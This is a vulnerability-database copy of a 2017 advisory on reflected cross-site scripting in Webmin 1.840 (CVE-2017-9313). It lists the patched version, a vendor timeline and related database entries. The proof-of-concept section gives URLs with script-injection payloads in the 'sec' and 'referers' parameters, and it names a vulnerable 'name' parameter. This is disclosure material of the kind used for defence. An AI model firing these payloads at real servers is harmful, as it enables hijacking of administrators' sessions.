Lucene search
Andy TanPACKETSTORM:143233HistoryJul 03, 2017 - 12:00 a.m.
Webmin 1.840 Cross Site Scripting
2017-07-0300:00:00
Andy Tan
packetstormsecurity.com
50
EPSS
0.002
Percentile
59.5%
`Vulnerability type: Reflected Cross Site Scripting
------------------------
Product: Webmin
------------------------
Affected version: Webmin 1.840 and possibly
earlier
------------------------
Patched version: Webmin 1.850
------------------------
Credit: Andy Tan
------------------------
CVE ID: CVE-2017-9313
------------------------
===============
Proof of Concept
================
Vulnerable Modules:
https://192.168.1.20:10000/man/view_man.cgi?page=foo&sec=<script>alert('xss')</script>
https://192.168.1.20:10000/webmin/change_referers.cgi?referer=0&referers=<script>alert('xss')</script>
https://192.168.1.20:10000/acl/save_user.cgi
(Vulnerable 'name' parameter)
Vendor contact timeline:
------------------------
2017-06-12: Contacted vendor.
2017-06-28: Vendor released new patch.
2017-07-02: Public disclosure.
`
Related
cvelist
cvelist
CVE-2017-9313
2017-07-04 02:00:00
prion
prion
Cross site scripting
2017-07-04 02:29:00
openvas
openvas
Webmin Multiple XSS Vulnerabilities (Jul 2017) - Linux
2017-07-11 00:00:00
Webmin Multiple XSS Vulnerabilities (Jul 2017) - Windows
2017-07-11 00:00:00
nvd
nvd
CVE-2017-9313
2017-07-04 02:29:00
zdt
zdt
Webmin 1.840 Cross Site Scripting Vulnerability
2017-07-04 00:00:00
osv
osv
CVE-2017-9313
2017-07-04 02:29:00
nessus
nessus
Webmin < 1.850 Multiple Cross Site Scripting Vulnerabilities
2018-03-22 00:00:00
cve
cve
CVE-2017-9313
2017-07-04 02:29:00